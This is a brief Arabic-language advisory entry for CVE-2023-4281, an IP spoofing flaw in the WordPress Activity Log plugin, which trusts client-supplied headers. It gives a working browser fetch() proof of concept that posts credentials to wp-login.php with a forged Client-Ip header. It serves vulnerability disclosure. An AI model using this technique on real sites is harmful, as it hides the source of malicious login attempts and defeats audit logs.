
مستودع لثغرة CVE-2023-4281.
CVE ID: CVE-2023-4281
Vulnerability Type: انتحال عنوان IP
Description: تقوم إضافة Activity Log باسترداد عناوين IP الخاصة بالعملاء من ترويسات يحتمل أن تكون غير موثوقة، مما يسمح للمهاجم بالتلاعب بقيمتها. قد يُستخدم هذا لإخفاء مصدر حركة المرور الخبيثة.
Steps to reproduce:
شغّل الكود التالي في متصفح الويب ولاحظ في الواجهة الخلفية أن عنوان IP قد تم تزويره.
await fetch("/wp-login.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
"Client-Ip": "8.8.8.8",
},
"body": "log=USERNAME&pwd=PASSWORD",
"method": "POST",
"mode": "cors",
"credentials": "include"
});
Reference: